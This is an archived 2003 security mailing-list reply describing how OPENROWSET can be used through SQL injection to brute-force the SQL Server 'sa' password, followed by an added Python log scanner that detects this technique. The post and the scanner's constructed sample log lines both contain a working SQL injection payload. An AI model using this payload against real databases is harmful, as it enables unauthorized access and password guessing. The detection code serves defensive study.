Re: Brute forcing a M$ SQL Server password through SQL Injection

From: David Litchfield (mnemonix@globalnet.co.uk)
Date: Thu Feb 20 2003 - 02:22:06 EST


>.....The goal is to elevate privileges.

>How would you achieve this? ...

You need to take a look at OPENROWSET:

' UNION SELECT * FROM
OPENROWSET('SQLOLEDB','localhost';'sa';'testpass','SELECT @@version')--

Ad hoc queries need to be enabled, though.

HTH,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
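
A defender-side check for the technique discussed in this message, added here as an example and not part of the original post: it scans web access logs for OPENROWSET/OPENDATASOURCE in request URLs and flags clients that cycle through passwords for one login. The log format, the sample lines, the helper names and the threshold of 3 are assumptions.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import unquote_plus

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')
ADHOC = re.compile(r"OPEN(?:ROWSET|DATASOURCE)\s*\(", re.I)
# Argument layout used in the post: 'provider','data source';'login';'password'
CREDS = re.compile(
    r"OPENROWSET\s*\(\s*'[^']*'\s*,\s*'[^']*'\s*;\s*'([^']*)'\s*;\s*'([^']*)'", re.I)

def decode(s, rounds=3):
    """URL-decode repeatedly so double-encoded requests are still matched."""
    for _ in range(rounds):
        nxt = unquote_plus(s)
        if nxt == s:
            break
        s = nxt
    return s

def scan(lines, threshold=3):
    """Return (ad hoc hits per client, {(client, login): distinct passwords tried})."""
    hits, guesses = defaultdict(int), defaultdict(set)
    for line in lines:
        m = REQ.match(line)
        url = decode(m.group(2)) if m else ""
        if not ADHOC.search(url):
            continue
        ip = m.group(1)
        hits[ip] += 1
        c = CREDS.search(url)
        if c:  # keep only a digest so the report never stores guessed passwords
            digest = hashlib.sha256(c.group(2).encode()).hexdigest()
            guesses[(ip, c.group(1).lower())].add(digest)
    brute = {k: len(v) for k, v in guesses.items() if len(v) >= threshold}
    return dict(hits), brute

def _line(ip, pw):  # constructed log line carrying the post's query shape
    q = ("1%27+UNION+SELECT+*+FROM+OpenRowset(%27SQLOLEDB%27,%27localhost%27;"
         f"%27sa%27;%27{pw}%27,%27SELECT+@@version%27)--")
    return f'{ip} - - [20/Feb/2003:02:10:01 -0500] "GET /item.asp?id={q} HTTP/1.0" 500 312'

# Constructed sample data (documentation IP ranges, placeholder passwords).
SAMPLE_LOG = [_line("192.0.2.10", p) for p in ("guess1", "guess2", "guess3")] + [
    _line("192.0.2.10", "guess4").replace("%27", "%2527"),  # double-encoded
    _line("198.51.100.7", "guess1"),
    '203.0.113.5 - - [20/Feb/2003:02:11:00 -0500] "GET /item.asp?id=42 HTTP/1.0" 200 1024',
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Any hit at all is worth reviewing on an application that never issues ad hoc distributed queries itself; the per-login count separates a single probe from password guessing.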

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:28 EDT